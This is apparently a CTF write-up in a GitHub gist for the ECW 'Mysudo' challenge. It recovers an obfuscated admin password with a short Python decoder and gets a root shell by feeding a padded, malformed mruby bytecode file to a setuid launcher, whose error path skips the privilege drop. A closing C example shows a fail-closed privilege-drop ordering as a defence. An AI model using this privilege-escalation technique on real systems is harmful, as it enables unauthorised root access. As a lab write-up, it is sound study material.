@LoadLow
Last active October 22, 2019 12:33
ECW Prequals - Challenge "Mysudo"

Static binary, PIE + ASLR + NX, probably not a BoF with a shellcode

I've exploited another BoF on the mruby file format / file reader

It was easier, I just had to trigger an error to avoid the setuid that drops privileges.

system("sh")
src = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r"
dst = "\x9b\xb0\xf6^\xda0\xd5E\x89B\xbb\xc8\xfe\xb3\xa4\xc3\xa7\xfa\xee\xfc\xc9\xfd\x96\xf8\x8a\x93\xba\f\v+\x16\n\x01J-\xe7\x84Aqo(\x8e3\xc5w\xf7\xe5\xaf$&\x03\xdd91\x81\x8fD\xf1k6\xc2\x8c\xaa\xce\x9c\xa5\xbf\xae\xcc\xff\xf2\xb1\xd0\x99\x8d\xde\x87x\x12\xc1\xf4\xca\r_\xbd\x11@#\"\xb7>s\x9a\xe3\xacIZ\x97"
password_dst = [
122, -111, -38, -11, -45, -11, -43, 90, 104, 36, 8, 91, 91, 91, 91
]
password_src = ""
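# Undo the XOR with 0xFE applied to each stored (signed) byte
for i in range(0, len(password_dst)):
    password_src += chr((password_dst[i] & 0xff) ^ 0xFE)
password_revd = ""
# Invert the substitution by mapping each encoded byte back through the src/dst table
for i in range(0, len(password_src)):
    password_revd += src[dst.find(password_src[i])]
print("That's probably not the solution but ... " + str(password_revd)) # ADMsystem42$$$$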
cp /app/main.mrb /tmp
mrdb -d main.mrb
r
e encode("0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~ \t\n\r")
ret [0] "\x9b\xb0\xf6^\xda0\xd5E\x89B\xbb\xc8\xfe\xb3\xa4\xc3\xa7\xfa\xee\xfc\xc9\xfd\x96\xf8\x8a\x93\xba\f\v+\x16\n\x01J-\xe7\x84Aqo(\x8e3\xc5w\xf7\xe5\xaf$&\x03\xdd91\x81\x8fD\xf1k6\xc2\x8c\xaa\xce\x9c\xa5\xbf\xae\xcc\xff\xf2\xb1\xd0\x99\x8d\xde\x87x\x12\xc1\xf4\xca\r_\xbd\x11@#\"\xb7>s\x9a\xe3\xacIZ\x97"
cd /tmp
vi gadget.rb
mrbc gadget.rb
echo "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" \
>> gadget.mrb
/app/mysudo gadget
Password: ***************
/tmp # id
uid=0(root) gid=0(root) groups=0(root)
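
The root shell above comes from an error path that skips the privilege drop. As an added example (not code from the challenge or from this gist), here is a fail-closed ordering for a setuid-root launcher that is assumed to run the user-supplied file unprivileged; `drop_privileges`, `load_script` and `prepare_untrusted_script` are hypothetical names, and the reader is a simplified stand-in that only checks the "RITE" identifier of compiled mruby bytecode.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently drop to the invoking user's ids; 0 only if the drop is verified. */
int drop_privileges(void) {
    uid_t uid = getuid();
    gid_t gid = getgid();
    if (setgid(gid) != 0) return -1;           /* group first, while still privileged */
    if (setuid(uid) != 0) return -1;           /* never ignore the return value */
    if (geteuid() != uid || getegid() != gid) return -1;
    if (uid != 0 && setuid(0) == 0) return -1; /* root must not be recoverable */
    return 0;
}

/* Hypothetical, simplified reader: accepts only files that start with the
   "RITE" identifier used by compiled mruby bytecode. */
int load_script(const char *path) {
    char magic[4];
    FILE *f = fopen(path, "rb");
    if (f == NULL) return -1;
    size_t n = fread(magic, 1, sizeof magic, f);
    fclose(f);
    return (n == sizeof magic && memcmp(magic, "RITE", 4) == 0) ? 0 : -1;
}

/* Fail-closed ordering: privileges are gone before any untrusted byte is
   parsed, so no parser error path can be reached while still root. */
int prepare_untrusted_script(const char *path) {
    if (drop_privileges() != 0) return -1;
    if (load_script(path) != 0) return -1;
    return 0;
}

int main(int argc, char **argv) {
    if (argc != 2) { fprintf(stderr, "usage: %s file.mrb\n", argv[0]); return 2; }
    if (prepare_untrusted_script(argv[1]) != 0) {
        fprintf(stderr, "refusing to run %s\n", argv[1]);
        return 1;
    }
    printf("ok: uid=%d euid=%d\n", (int)getuid(), (int)geteuid());
    return 0;
}
```

With this ordering a malformed file such as the padded `gadget.mrb` is only ever parsed with the caller's own uid, whatever the reader does with it.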